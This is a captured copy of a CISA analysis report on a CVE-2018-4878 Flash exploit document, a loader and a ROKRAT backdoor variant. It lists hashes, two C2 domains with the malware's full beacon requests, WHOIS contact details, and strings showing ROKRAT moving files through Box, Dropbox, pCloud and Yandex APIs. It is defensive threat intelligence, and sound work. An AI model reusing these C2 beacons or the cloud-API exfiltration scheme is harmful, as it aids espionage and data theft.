www.cisa.gov
Open in
urlscan Pro
2600:141b:1c00:258d::447a
Public Scan
Submitted URL: https://www.us-cert.gov/ncas/analysis-reports/ar20-133d
Effective URL: https://www.cisa.gov/news-events/analysis-reports/ar20-133d
Submission: On November 14 via api from IN — Scanned from US
Effective URL: https://www.cisa.gov/news-events/analysis-reports/ar20-133d
Submission: On November 14 via api from IN — Scanned from US
Form analysis
2 forms found in the DOM<form class="gsc-search-box gsc-search-box-tools" accept-charset="utf-8">
<table cellspacing="0" cellpadding="0" role="presentation" class="gsc-search-box">
<tbody>
<tr>
<td class="gsc-input">
<div class="gsc-input-box" id="gsc-iw-id1">
<table cellspacing="0" cellpadding="0" role="presentation" id="gs_id50" class="gstl_50 gsc-input" style="width: 100%; padding: 0px;">
<tbody>
<tr>
<td id="gs_tti50" class="gsib_a"><input autocomplete="off" type="text" size="10" class="gsc-input" name="search" title="search" aria-label="search" id="gsc-i-id1" dir="ltr" spellcheck="false"
style="width: 100%; padding: 0px; border: none; margin: 0px; height: auto; outline: none;"></td>
<td class="gsib_b">
<div class="gsst_b" id="gs_st50" dir="ltr"><a class="gsst_a" href="javascript:void(0)" title="Clear search box" role="button" style="display: none;"><span class="gscb_a" id="gs_cb50" aria-hidden="true">×</span></a></div>
</td>
</tr>
</tbody>
</table>
</div>
</td>
<td class="gsc-search-button"><button class="gsc-search-button gsc-search-button-v2"><svg width="13" height="13" viewBox="0 0 13 13">
<title>search</title>
<path
d="m4.8495 7.8226c0.82666 0 1.5262-0.29146 2.0985-0.87438 0.57232-0.58292 0.86378-1.2877 0.87438-2.1144 0.010599-0.82666-0.28086-1.5262-0.87438-2.0985-0.59352-0.57232-1.293-0.86378-2.0985-0.87438-0.8055-0.010599-1.5103 0.28086-2.1144 0.87438-0.60414 0.59352-0.8956 1.293-0.87438 2.0985 0.021197 0.8055 0.31266 1.5103 0.87438 2.1144 0.56172 0.60414 1.2665 0.8956 2.1144 0.87438zm4.4695 0.2115 3.681 3.6819-1.259 1.284-3.6817-3.7 0.0019784-0.69479-0.090043-0.098846c-0.87973 0.76087-1.92 1.1413-3.1207 1.1413-1.3553 0-2.5025-0.46363-3.4417-1.3909s-1.4088-2.0686-1.4088-3.4239c0-1.3553 0.4696-2.4966 1.4088-3.4239 0.9392-0.92727 2.0864-1.3969 3.4417-1.4088 1.3553-0.011889 2.4906 0.45771 3.406 1.4088 0.9154 0.95107 1.379 2.0924 1.3909 3.4239 0 1.2126-0.38043 2.2588-1.1413 3.1385l0.098834 0.090049z">
</path>
</svg></button></td>
<td class="gsc-clear-button">
<div class="gsc-clear-button" title="clear results"> </div>
</td>
</tr>
</tbody>
</table>
</form>
<form class="gsc-search-box gsc-search-box-tools" accept-charset="utf-8">
<table cellspacing="0" cellpadding="0" role="presentation" class="gsc-search-box">
<tbody>
<tr>
<td class="gsc-input">
<div class="gsc-input-box" id="gsc-iw-id2">
<table cellspacing="0" cellpadding="0" role="presentation" id="gs_id51" class="gstl_51 gsc-input" style="width: 100%; padding: 0px;">
<tbody>
<tr>
<td id="gs_tti51" class="gsib_a"><input autocomplete="off" type="text" size="10" class="gsc-input" name="search" title="search" aria-label="search" id="gsc-i-id2" dir="ltr" spellcheck="false"
style="width: 100%; padding: 0px; border: none; margin: 0px; height: auto; outline: none;"></td>
<td class="gsib_b">
<div class="gsst_b" id="gs_st51" dir="ltr"><a class="gsst_a" href="javascript:void(0)" title="Clear search box" role="button" style="display: none;"><span class="gscb_a" id="gs_cb51" aria-hidden="true">×</span></a></div>
</td>
</tr>
</tbody>
</table>
</div>
</td>
<td class="gsc-search-button"><button class="gsc-search-button gsc-search-button-v2"><svg width="13" height="13" viewBox="0 0 13 13">
<title>search</title>
<path
d="m4.8495 7.8226c0.82666 0 1.5262-0.29146 2.0985-0.87438 0.57232-0.58292 0.86378-1.2877 0.87438-2.1144 0.010599-0.82666-0.28086-1.5262-0.87438-2.0985-0.59352-0.57232-1.293-0.86378-2.0985-0.87438-0.8055-0.010599-1.5103 0.28086-2.1144 0.87438-0.60414 0.59352-0.8956 1.293-0.87438 2.0985 0.021197 0.8055 0.31266 1.5103 0.87438 2.1144 0.56172 0.60414 1.2665 0.8956 2.1144 0.87438zm4.4695 0.2115 3.681 3.6819-1.259 1.284-3.6817-3.7 0.0019784-0.69479-0.090043-0.098846c-0.87973 0.76087-1.92 1.1413-3.1207 1.1413-1.3553 0-2.5025-0.46363-3.4417-1.3909s-1.4088-2.0686-1.4088-3.4239c0-1.3553 0.4696-2.4966 1.4088-3.4239 0.9392-0.92727 2.0864-1.3969 3.4417-1.4088 1.3553-0.011889 2.4906 0.45771 3.406 1.4088 0.9154 0.95107 1.379 2.0924 1.3909 3.4239 0 1.2126-0.38043 2.2588-1.1413 3.1385l0.098834 0.090049z">
</path>
</svg></button></td>
<td class="gsc-clear-button">
<div class="gsc-clear-button" title="clear results"> </div>
</td>
</tr>
</tbody>
</table>
</form>
Text Content
Skip to main content An official website of the United States government Here’s how you know Here’s how you know Official websites use .gov A .gov website belongs to an official government organization in the United States. Secure .gov websites use HTTPS A lock (LockA locked padlock) or https:// means you’ve safely connected to the .gov website. Share sensitive information only on official, secure websites. Free Cyber ServicesElection Threat Updates#protect2024Secure Our WorldShields UpReport A Cyber Issue Search × search Menu Close × search * Topics Topics Cybersecurity Best Practices Cyber Threats and Advisories Critical Infrastructure Security and Resilience Election Security Emergency Communications Industrial Control Systems Information and Communications Technology Supply Chain Security Partnerships and Collaboration Physical Security Risk Management How can we help? GovernmentEducational InstitutionsIndustryState, Local, Tribal, and TerritorialIndividuals and FamiliesSmall and Medium BusinessesFind Help LocallyFaith-Based CommunityExecutivesHigh-Risk Communities * Spotlight * Resources & Tools Resources & Tools All Resources & Tools Services Programs Resources Training Groups * News & Events News & Events News Events Cybersecurity Alerts & Advisories Directives Request a CISA Speaker Congressional Testimony CISA Conferences CISA Live! * Careers Careers Benefits & Perks HireVue Applicant Reasonable Accommodations Process Hiring Resume & Application Tips Students & Recent Graduates Veteran and Military Spouses Work @ CISA * About About Culture Divisions & Offices Regions Leadership Doing Business with CISA Site Links Reporting Employee and Contractor Misconduct CISA GitHub CISA Central 2023 Year In Review Contact Us Subscribe Free Cyber ServicesElection Threat Updates#protect2024Secure Our WorldShields UpReport A Cyber Issue Breadcrumb 1. Home 2. News & Events 3. Cybersecurity Advisories 4. Analysis Report Share: Analysis Report MAR-10160323-1.V2 Last Revised May 12, 2020 Alert Code AR20-133D NOTIFICATION This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise. This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp. SUMMARY DESCRIPTION The CISA Code & Media Analysis team received three artifacts for analysis. The first artifact is a malicious Microsoft Word document that contains an embedded Shockwave Flash (SWF) application file. This embedded SWF file attempts to exploit the vulnerability detailed within CVE-2018-4878. The second artifact executes an embedded resource named “JOK” and injects it into the Windows application “Wscript.exe.” This embedded resource contains an encoded variant of the malware known as ROKRAT. The third artifact in this report is the embedded ROKRAT variant, which was extracted from the loader during analysis. For a downloadable copy of IOCs, see MAR-10160323-1.v2.stix. SUBMITTED FILES (5) 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c (3f98c434d7b39de61a8b459180dd46...) 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a (aa525af1589156fc09f78e69b3b034...) e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd (d2881e56e66aeaebef7efaa60a58ef...) e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573 (5c6c1ed910e7c9740a0289a6d27890...) fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0 (111d205422fe90848c2f41cc84ebd9...) DOMAINS (2) www.1588-2040.co.kr www.korea-tax.info FINDINGS 3B1395F620E428C5F68C6497A2338DA0C4F749FEB64E8F12E4C5B1288CC57A1C TAGS CVE-2018-4878trojan DETAILS Name 3f98c434d7b39de61a8b459180dd46a3 Size 121344 bytes Type Composite Document File V2 Document, Cannot read section info MD5 3f98c434d7b39de61a8b459180dd46a3 SHA1 1584b3ce64835a3c7b796139fbd981a9f2cddb6c SHA256 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c SHA512 27643afc00fda2dd8b447af1e6950d65fe5b4dd91a8eb022fef68694126efe41fd8895a6c065c261507bb526668c27f4bc055ac58c592d43cf760c32e365be2d ssdeep 1536:+dVr1FoOLJEd4EQA9mVOkxN7ORzh9n98scLzA4QfwnEOCnnvlQXRhuA+0qwvxH9n:u1FLNEfBj2NSRvZQnEDtShuA3H9yW Entropy 7.947501 ANTIVIRUS Ahnlab SWF/Agent Antiy Trojan[Exploit]/SWF.CVE-2018-4878 Avira EXP/CVE-2018-4878.A.Gen BitDefender Exploit.Agent.MS ClamAV Swf.Trojan.Rokrat-6443186-0 Cyren Siwifi ESET SWF/Exploit.CVE-2018-4878.A trojan Emsisoft Exploit.Agent.MS (B) Ikarus Trojan.SWF.Exploit McAfee RDN/Generic Exploit.lv Microsoft Security Essentials Exploit:SWF/Korpode.A NetGate Exploit.Win32.Generic Quick Heal Exp.OLE.CVE-2018-4878.C Sophos Troj/SwfExp-OI Symantec Trojan.Gen.NPE.2 TACHYON Trojan-Exploit/W97.Agent.Gen TrendMicro TROJ_EX.F2A7C559 TrendMicro House Call TROJ_EX.F2A7C559 YARA RULES No matches found. SSDEEP MATCHES 97 6280a646ded60de151e1c8ad25f7756e2254f6cb5a7720e704589d692898f8e1 97 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a 97 e3247251d459a89493a1494052ad11d8f8c2fd911acd7eedd5bfd78b6bd34c87 RELATIONSHIPS 3b1395f620... Contains 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a DESCRIPTION This file is a malicious Microsoft Word document. This document contains an embedded malicious ShockWave Flash (SWF) file (851b7b04cc) designed to exploit the vulnerability detailed within CVE-2018-4878. 851B7B044CBCAA67350AFF80A5B9FB4C63393957F3D4B30005A83348FE69AC5A TAGS CVE-2018-4878trojan DETAILS Name aa525af1589156fc09f78e69b3b03428 Size 117864 bytes Type Macromedia Flash data, version 32 MD5 aa525af1589156fc09f78e69b3b03428 SHA1 6ff889358923ab2a0de80303be9ac559a555b9b9 SHA256 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a SHA512 3a82f830bcf547c94a3b0e56ffa27330328b392a4d1356f7e62a28c18d2eb110507968a3f66e51e985ffceb3640885e5402623cf9ab987ae7a005cff2b1edd57 ssdeep 1536:4dVr1FoOLJEd4EQA9mVOkxN7ORzh9n98scLzA4QfwnEOCnnvlQXRhuA+0qwvxH9S:41FLNEfBj2NSRvZQnEDtShuA3H9yf Entropy 7.987027 ANTIVIRUS Ahnlab SWF/Cve-2018-4878.R.SS18 Avira EXP/CVE-2018-4878.A.Gen BitDefender Exploit.Agent.MS ClamAV Win.Trojan.Agent-6551186-0 Cyren SWF/CVE-2018-4878.B!Camelot ESET SWF/Exploit.CVE-2018-4878.A trojan Emsisoft Exploit.Agent.MS (B) Ikarus Trojan.SWF.Exploit McAfee Exploit-CVE2018-4878.b Microsoft Security Essentials Exploit:SWF/Korpode.A!gen Quick Heal Exp.SWF.CVE-2018-4878.D Sophos Troj/SwfExp-OK Symantec Trojan.Gen.NPE.2 TACHYON Trojan-Exploit/SWF.Agent.Gen YARA RULES No matches found. SSDEEP MATCHES 97 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c 99 6280a646ded60de151e1c8ad25f7756e2254f6cb5a7720e704589d692898f8e1 97 e3247251d459a89493a1494052ad11d8f8c2fd911acd7eedd5bfd78b6bd34c87 RELATIONSHIPS 851b7b044c... Contained_Within 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c 851b7b044c... Connected_To www.korea-tax.info DESCRIPTION This file is the malicious ShockWave Flash (SWF) file embedded in the Microsoft Word document 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c. When the malware is executed, it attempts to connect to the hard-coded Command and Control (C2) server "www.korea-tax.info." WWW.KOREA-TAX.INFO TAGS command-and-control URLS * www.korea-tax.info/crossdomain.xml * www.korea-tax.info/main/local.php?id=8B4D963B41003E407AC0022E40FCE01C1DA94EB8DEEF20939722ABBFE7F52B9C7DEA62EFDB0D82345AE24D366F9C7BDC2C8F5C460AE8BE18E59C1116489EC9F2EB5504617A4D6D74982D602624E94F32BB3864277E4967BD15B1E36AF4A98431DC76C4BB&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207 PORTS * 80 TCP HTTP SESSIONS * GET /crossdomain.xml HTTP/1.1 Host: www.korea-tax.info Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 * GET /main/local.php?id=8B4D963B41003E407AC0022E40FCE01C1DA94EB8DEEF20939722ABBFE7F52B9C7DEA62EFDB0D82345AE24D366F9C7BDC2C8F5C460AE8BE18E59C1116489EC9F2EB5504617A4D6D74982D602624E94F32BB3864277E4967BD15B1E36AF4A98431DC76C4BB&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207 HTTP/1.1 Host: www.korea-tax.info Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 WHOIS Queried whois.afilias.info with "korea-tax.info"... Domain Name: KOREA-TAX.INFO Registry Domain ID: D503300000055962553-LRMS Registrar WHOIS Server: Registrar URL: http://www.PublicDomainRegistry.com Updated Date: 2018-02-10T20:31:57Z Creation Date: 2017-12-12T05:52:58Z Registry Expiry Date: 2018-12-12T05:52:58Z Registrar Registration Expiration Date: Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registrar IANA ID: 303 Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com Registrar Abuse Contact Phone: +1.2013775952 Reseller: Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: C213778924-LRMS Registrant Name: yang jieun Registrant Organization: yang jieun Registrant Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do Registrant City: Kwangmyong Registrant State/Province: Kyonggi-do Registrant Postal Code: 14200 Registrant Country: KR Registrant Phone: +82.1044612320 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: john.chapman91128@gmail.com Registry Admin ID: C213778924-LRMS Admin Name: yang jieun Admin Organization: yang jieun Admin Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do Admin City: Kwangmyong Admin State/Province: Kyonggi-do Admin Postal Code: 14200 Admin Country: KR Admin Phone: +82.1044612320 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: john.chapman91128@gmail.com Registry Tech ID: C213778924-LRMS Tech Name: yang jieun Tech Organization: yang jieun Tech Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do Tech City: Kwangmyong Tech State/Province: Kyonggi-do Tech Postal Code: 14200 Tech Country: KR Tech Phone: +82.1044612320 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: john.chapman91128@gmail.com Registry Billing ID: C213778924-LRMS Billing Name: yang jieun Billing Organization: yang jieun Billing Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do Billing City: Kwangmyong Billing State/Province: Kyonggi-do Billing Postal Code: 14200 Billing Country: KR Billing Phone: +82.1044612320 Billing Phone Ext: Billing Fax: Billing Fax Ext: Billing Email: john.chapman91128@gmail.com Name Server: NS3.HOSTINGER.COM Name Server: NS4.HOSTINGER.COM Name Server: NS1.HOSTINGER.COM Name Server: NS2.HOSTINGER.COM DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ RELATIONSHIPS www.korea-tax.info Connected_From 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a DESCRIPTION Identified malicious C2 Server. FEC71B8479F3A416FA58580AE76A8C731C2294C24663C601A1267E0E5C2678A0 TAGS CVE-2018-4878trojan DETAILS Name 111d205422fe90848c2f41cc84ebd96a Size 117338 bytes Type Macromedia Flash data, version 32 MD5 111d205422fe90848c2f41cc84ebd96a SHA1 b03f6f336c07d514edb15d6e3fefd98432cae7e2 SHA256 fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0 SHA512 a8e7db77fd6f27ae8ca18be8ed644df3443d17b048fc6baf1b7496da2810b014e19a35e9502de252ad65cf4feb07ccba53aeb567ad62d897231c1a3b17d619b5 ssdeep 3072:BebZ1dssmUo7VUthHkNEVVKJ6ydYBpb2N4r1Je:sbZfssAGoQymsgM Entropy 7.983610 ANTIVIRUS Ahnlab SWF/Cve-2018-4878.R.SS18 Antiy Trojan[Exploit]/SWF.CVE-2018-4878 Avira EXP/CVE-2018-4878.A.Gen BitDefender Script.SWF.C589 ClamAV Swf.Trojan.Rokrat-6443186-0 Cyren SWF/CVE-2018-4878.B!Camelot ESET SWF/Exploit.CVE-2018-4878.A trojan Emsisoft Script.SWF.C589 (B) Ikarus Trojan.SWF.Exploit McAfee Exploit-CVE2018-4878.b Microsoft Security Essentials Exploit:SWF/Korpode.A!gen NANOAV Exploit.Swf.CVE20184878.exmycd Quick Heal Exp.SWF.CVE-2018-4878.D Sophos Troj/SWFExp-OL Symantec Trojan.Gen.2 TACHYON Trojan-Exploit/SWF.Agent.Gen TrendMicro SWF_EXP.3A46FD51 TrendMicro House Call SWF_EXP.3A46FD51 YARA RULES No matches found. SSDEEP MATCHES 99 3004196da6055c6f062c94a9aae8dc357fa19b953b071049083e69e840083cf9 RELATIONSHIPS fec71b8479... Connected_To www.1588-2040.co.kr DESCRIPTION This file is a malicious ShockWave Flash (SWF) file designed to exploit the vulnerability detailed within CVE-2018-4878. When executed, the malware attempts to connect to the hard-coded command-and-control (C2) server "www.1588-2040.co.kr." WWW.1588-2040.CO.KR TAGS command-and-control URLS * www.1588-2040.co.kr/crossdomain.xml * www.1588-2040.co.kr/design/m/images/image/image.php?id=2E4B4EE62772DB77094E0210546BEEBF2F669A2309009324807100E182FFDFEAB2CE91B00DFA993ACDE3A1198DC8BD9DAF98F449FB04FD8588D94693E08D3BC45F17C4ECDC040F138CC8916D2252478D3BE342D5FA1F6231EF6562053E5C1463FDCEEE82&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207 PORTS * 80 TCP HTTP SESSIONS * GET /crossdomain.xml HTTP/1.1 Host: www.1588-2040.co.kr Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 * GET /design/m/images/image/image.php?id=2E4B4EE62772DB77094E0210546BEEBF2F669A2309009324807100E182FFDFEAB2CE91B00DFA993ACDE3A1198DC8BD9DAF98F449FB04FD8588D94693E08D3BC45F17C4ECDC040F138CC8916D2252478D3BE342D5FA1F6231EF6562053E5C1463FDCEEE82&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207 HTTP/1.1 Host: www.1588-2040.co.kr Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 WHOIS Domain Name : 1588-2040.co.kr Registrant : S.S. Moon Registrant Address : 1303 manhatan b/d 36-2, Yeoeuido-dong Yeongdeungpo-gu Seoul Korea Registrant Zip Code : 150749 Administrative Contact(AC) : S.S. Moon AC E-Mail : card15882040@nate.com AC Phone Number : 02-2090-3500 Registered Date : 2009. 07. 03. Last Updated Date : 2015. 07. 03. Expiration Date : 2018. 07. 03. Publishes : Y Authorized Agency : Asadal, Inc.(http://www.asadal.co.kr) DNSSEC : unsigned Primary Name Server Host Name : ns.epart.com Secondary Name Server Host Name : ns1.epart.com RELATIONSHIPS www.1588-2040.co.kr Connected_From fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0 DESCRIPTION Identified malicious C2 domain. E1546323DC746ED2F7A5C973DCECC79B014B68BDD8A6230239283B4F775F4BBD TAGS backdoordroppertrojan DETAILS Name d2881e56e66aeaebef7efaa60a58ef9b Size 626688 bytes Type PE32 executable (GUI) Intel 80386, for MS Windows MD5 d2881e56e66aeaebef7efaa60a58ef9b SHA1 c09c1be69e5a206bcfe3d726773f0b0ddecb3622 SHA256 e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd SHA512 da6e40bcebc6161386142caa6c1e68faf7f520cc48cbb514d8029d65f9bb0cac14bde435eb584a998be9e379cc875b85719cc0d4ee9d0fed73b5c20cf7da7fe8 ssdeep 12288:cbeQy0+6dUlyAcdqfAkMvGpns9gKYLd+NjhzZkZf7:AfuJGv2ns9XRkZf Entropy 7.866467 ANTIVIRUS Ahnlab Trojan/Win32.Loader Antiy Trojan/Win32.RockRat Avira TR/Dropper.Gen BitDefender Trojan.GenericKD.41796224 ClamAV Win.Trojan.Rokrat-6443187-0 Cyren W32/Trojan.IKOU-3732 ESET Win32/Spy.Agent.PHF trojan Emsisoft Trojan.GenericKD.41796224 (B) Filseclab Trojan.RockRat.gen.qzrl Ikarus Trojan.Win32.Krypt K7 Trojan ( 00525b861 ) McAfee Trojan-FPCM!D2881E56E66A Microsoft Security Essentials Trojan:Win32/Korpode.A!dha NANOAV Trojan.Win32.RockRat.exmijf NetGate Trojan.Win32.Malware Quick Heal Trojan.RockRat.S1875120 Sophos Mal/FakeAV-ST Symantec Backdoor.Rokrat Systweak trojan.korpode TrendMicro Backdoo.3FA9A8A6 TrendMicro House Call Backdoo.3FA9A8A6 Vir.IT eXplorer Trojan.Win32.Spy.AST VirusBlokAda Malware-Cryptor.Inject.gen YARA RULES No matches found. SSDEEP MATCHES No matches found. PACKERS/COMPILERS/CRYPTORS Microsoft Visual C++ ?.? RELATIONSHIPS e1546323dc... Contains e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573 DESCRIPTION This file is a loader. It is designed to load and execute data contained within an embedded resource named "JOK" into the Windows application "Wscript.exe." The embedded "JOK" resource is approximately 522,848 bytes in size and contains executable code. The beginning portion of the data reveals the presence of a NOP sled (0x90, 0x90, 0x90, ...), which leads to a decoder stub. The decoder code decodes the embedded executable code within the Windows "Wscript.exe" process. The embedded executable code has been identified as ROKRAT (e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573). SCREENSHOTS Figure 1 - E200517AB9482E787A59E60ACCC8552BD0C844687CD0CF8EC4238ED2FC2FA573 TAGS spywaretrojan DETAILS Name 5c6c1ed910e7c9740a0289a6d278908a Size 520704 bytes Type PE32 executable (GUI) Intel 80386, for MS Windows MD5 5c6c1ed910e7c9740a0289a6d278908a SHA1 0e46e026890982da526d8acf9f1ce6287451c9a6 SHA256 e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573 SHA512 e2d3059e28998bfb5c0badf3d6d8df28e527037c33b489b7dcc2f392a1d91a568beef410a4feaabc4daee98112142e58394ed5e2a73c71ed0cb46943eb3383d1 ssdeep 6144:Wh65XKGJs5Ve5psLyYuwAKdf9Q4p9FCAkko7cmxBZAk4+AJ6P3VNUo+wABK7Cl/5:SAKdf+4p9J2x0k4+AQ3VNH+rZx7Aq9 Entropy 6.560851 ANTIVIRUS Ahnlab Trojan/Win32.Hwdoor Antiy Trojan[Spy]/Win32.Agent Avira HEUR/AGEN.1133065 BitDefender Gen:Variant.Graftor.538484 ClamAV Win.Trojan.Rokrat-6380697-0 ESET a variant of Win32/Spy.Agent.PHF trojan Emsisoft Gen:Variant.Graftor.538484 (B) Ikarus Trojan-Spy.Agent K7 Spyware ( 0051fbf81 ) Microsoft Security Essentials Trojan:Win32/Korpode.A!dha NANOAV Trojan.Win32.Generic.evuabe NetGate Trojan.Win32.Malware Sophos Troj/Spy-AQO Symantec Trojan.Gen.2 Systweak malware.gen-rg TACHYON Trojan-Spy/W32.Agent.520704.E TrendMicro TSPY_KO.89D03B8E TrendMicro House Call TSPY_KO.89D03B8E Vir.IT eXplorer Trojan.Win32.Spy.BUB VirusBlokAda TrojanSpy.Agent YARA RULES No matches found. SSDEEP MATCHES No matches found. PACKERS/COMPILERS/CRYPTORS Microsoft Visual C++ ?.? RELATIONSHIPS e200517ab9... Contained_Within e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd DESCRIPTION This file has been identified as a variant of the malware known as ROKRAT and was obtained by extracting it from the file e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd. Displayed below are strings of interest extracted from this variant of ROKRAT. --Begin Strings of Interest-- Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 access_token authorization_code bearer client_id client_secret code expires_in grant_type redirect_uri refresh_token response_type scope state token token_type access_token authorization_code bearer client_id client_secret code expires_in grant_type redirect_uri refresh_token response_type scope state token token_type Accept Accept-Charset Accept-Encoding Accept-Language Accept-Ranges Age Allow Authorization Cache-Control Connection Content-Encoding Content-Language Content-Length Content-Location Content-MD5 Content-Range Content-Type Content-Disposition Date ETag Expect Expires From Host If-Match If-Modified-Since If-None-Match If-Range If-Unmodified-Since Last-Modified Location Max-Forwards Pragma Proxy-Authenticate Proxy-Authorization Range Referer Retry-After Server Trailer Transfer-Encoding Upgrade User-Agent Vary Via Warning WWW-Authenticate Cookie Set-Cookie text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 en-US,en;q=0.8 Bearer http://127.0.0.1/ https://api.box.com/oauth2/token https://account.box.com/api/oauth2/authorize https://api.box.com/2.0/folders/%s/items GET entries etag name sequence_id type folder file POST 201 409 DELETE 204 https://api.box.com/2.0/files/%s/content 200 https://api.box.com/2.0/files/%s https://api.box.com/2.0/files/%s/trash https://upload.box.com/api/2.0/files/content --opxer-- Content-Disposition: form-data; name="attributes" "}} ", "parent":{"id":" {"name":" Content-Disposition: form-data; name="file"; filename=" Content-Type: video/dat multipart/form-data;boundary=--opxer-- error sha1 description created_at modified_at size https://api.box.com/2.0/folders/%s Error var request_token = ' max-age=0 <input type="hidden" name="ic" value=" <input type="hidden" name="state" value=" <form action=" box_visitor_id= bv= cn= site_preference= 302 vector<T> too long invalid string position string too long Aapplication/json path https://api.dropboxapi.com/2/files/delete https://content.dropboxapi.com/2/files/upload application/octet-stream {"path":"%s","mode":{".tag":"overwrite"}} {"path":"%s"} Dropbox-API-Arg https://content.dropboxapi.com/2/files/download Ahttps://api.pcloud.com/oauth2_token https://my.pcloud.com/oauth2/authorize https://api.pcloud.com/uploadfile?path=%s&filename=%s&nopartial=1 --wwjaughalvncjwiajs-- Content-Type: voice/mp3 multipart/form-data;boundary=--wwjaughalvncjwiajs-- fileids https://api.pcloud.com/getfilelink?path=%s&forcedownload=1&skipfilename=1 hosts https://%s%s https://api.pcloud.com/deletefile?path=%s true %s/%s OAuth PUT href https://cloud-api.yandex.net/v1/disk/resources?path=%s&permanently=%s false 202 https://cloud-api.yandex.net/v1/disk/resources/upload?path=%s&overwrite=%s method https://cloud-api.yandex.net/v1/disk/resources/download?path=%s --End Strings of Interest-- RELATIONSHIP SUMMARY 3b1395f620... Contains 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a 851b7b044c... Contained_Within 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c 851b7b044c... Connected_To www.korea-tax.info www.korea-tax.info Connected_From 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a fec71b8479... Connected_To www.1588-2040.co.kr www.1588-2040.co.kr Connected_From fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0 e1546323dc... Contains e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573 e200517ab9... Contained_Within e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd RECOMMENDATIONS CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts. * Maintain up-to-date antivirus signatures and engines. * Keep operating system patches up-to-date. * Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication. * Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required. * Enforce a strong password policy and implement regular password changes. * Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known. * Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests. * Disable unnecessary services on agency workstations and servers. * Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header). * Monitor users' web browsing habits; 